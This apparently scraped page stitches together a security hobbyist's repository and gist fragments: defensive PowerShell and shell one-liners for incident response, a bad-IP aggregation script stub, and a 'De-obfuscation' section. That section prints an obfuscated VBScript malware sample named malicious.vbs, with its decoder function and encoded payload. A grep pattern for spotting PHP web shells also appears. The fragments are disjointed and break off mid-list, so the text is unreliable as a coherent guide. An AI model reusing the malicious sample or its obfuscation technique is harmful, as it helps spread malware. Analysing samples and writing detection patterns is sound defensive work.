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sqlite.ps1 - Install, run, and uninstall sqlite for all you hacky needs.
Should be no outputs other than what is generated in the sqlite session.
.\sqlite.ps1 - _Runs the script_
Underscores denote sarcasm

De-obfuscation 23/07/2020

The raw script malicious.vbs

Private Function BysqAEwmfD(zEx) : If Len(zEx) < 5 Then : a = "" : Exit Function : End If : Dim p : zEx = Mid(zEx,3,Len(zEx)-4) : For i=2 To Len(zEx) Step 2 : xehFDCC = Asc(Mid(zEx,i,1)) + 10 : If xehFDCC > 126 Then : xehFDCC = xehFDCC - 126 + 33 - 1 : End If : j=Chr(xehFDCC) : If j = "~" Then : j=" " : End If : p = p & j : Next : BysqAEwmfD = p : End Function : BnjBhzaGjEs = BysqAEwmfD("}H6Iv[7j~tci.[phYlt_nY9[/t*3rtH91hl[]W^j|[3EDXw`{[&YWj:|CvjInYN^([hZkk,bm[w$QI\[NhTlv_rYr[HvO}gtL0&tNY:W`bDb~t]i.[KhUlj_JY^[y$!9yevd*d|[{YBjN|u}/t+0Tt#:,_DcMt=jBWhi:a?:B[q\z_Vd~_(j+_oe3det_0ytmI>[rjatgj0WVi'aE:5[i\`_3d+_@jM_]eTd#tb3=tkik[(h=lX_:Y=[v$1DS[bmKJ]W,i3aJ|Q&>}Rt|tS0[tcjDWliXa_:)[(\j_=dl_Aj&_Yeqd\$'H+[r]/_(iaj^hUWujE_>eTd6?cd`\de,$"":x[YikY=hN_#fWj%_,e^d9tR3HtrvSj0WAilan:>[2ibY6v0t^0Itqj~W=iHa>:S[/\^_Ldi_Zj#_KepdU$uIz[:jkj{_cdC]\i=$=;}dpWdX-bK[fZ>te3ktZJ>h5k.[?t-0.tOj8WfiGaY:D[5\]_7df_UjZ_[e!dk$%I*[Gj<j__.dr]BiD$RIEj#WshijdM1^A[rd17olPW4_rbiW
Pull the following from the DC:
# Local Time
# Desktop settings
# BIOS info
# Installed hotfixes
# Operating System Version Information
# Local Users and owner
# All services on local machine
# Lets get those evil IPS!
# If you’re using Linux or BSD systems, check your favourite package repository for python-celementtree or py-celementtree packages
# Aggregation of bad IPs is what this is after, and that's what I'll make it do
import xml.etree.cElementTree as ET
import numpy as np
import sys
Uninstall HP Data Protector if it exists
Path for:
# HP Data Protector
Console output - Currently
Version: 1.0
say -v Karen "theee"
say -v Daniel "eeeeee"
say -v Alex "eeeeee"
say -v Tessa "eeeeee"
## Using Test-Connection, test connectivity to the internet using the following as subjects: ##
## Find and replace XXXX with your choice of internal DNS name :)
function UX-Pause {
Write-Progress -Activity "Testing Connection" -SecondsRemaining 3
Start-Sleep 1
for filename in `ls -l . | awk '{print $9}'`; do getcap $filename; done
# Look for potentially bad stuff that's compressed to hide mysterious things - run this within documentroot's of web servers to find potential php shells (source:
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include=*.php*
# Print out processes in a nicer format to compare its shown source to actual source
ps -Ao pid,comm,cmd,lstart
# Deny those damn pesky processes their CPU time - this is based on all the bad processes being under a single user. Don't run this unless you're sure that
pkill -U <user> -STOP || pkill -STOP -U <user> # Depeding on OS
# Deny processes CPU time - this is based on a process by process working order
CrazyLlama / gist:e9c5a931c9b37fc2cf40d184e23a7c94
Created November 16, 2017 10:12
Example one-liners, powershell edition
## Sources:
# Lists out all established TCP connections, you can also use netstat to list all connections regardless of status. Make sure you decide whether this is TCP or UDP you want to see and remove the parentheses
Get-NetTCPConnection –State Established
netstat -ano -p (TCP/UDP)
# List out all processes running on the server